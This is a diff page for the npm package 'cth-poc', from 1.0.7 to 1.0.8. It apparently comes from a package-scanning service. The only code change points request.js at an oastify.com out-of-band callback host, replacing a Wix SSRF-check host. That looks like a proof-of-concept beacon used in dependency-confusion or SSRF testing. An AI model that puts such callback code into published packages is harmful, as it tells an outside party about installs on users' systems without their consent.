cth-poc 1.0.7 → 1.0.8

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/package.json +1 -1
  2. package/request.js +1 -1
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "cth-poc",
3
- "version": "1.0.7",
3
+ "version": "1.0.8",
4
4
  "description": "",
5
5
  "main": "index.js",
6
6
  "scripts": {
package/request.js CHANGED
@@ -1,7 +1,7 @@
1
1
  const https = require('https');
2
2
 
3
3
  const options = {
4
- hostname: 'ac1ae4a3-2131-40c6-be46-6a941fa50800.ssrf-check.wix.com', // Ganti dengan domain yang sesuai
4
+ hostname: 'uxvh7cbxpj25lz7jzoj3fc2t5kbbz2nr.oastify.com', // Ganti dengan domain yang sesuai
5
5
  port: 443, // Port HTTPS umum adalah 443
6
6
  path: '/collaborator', // Ganti dengan path yang sesuai
7
7
  method: 'GET', // Metode HTTP, bisa GET, POST, dll.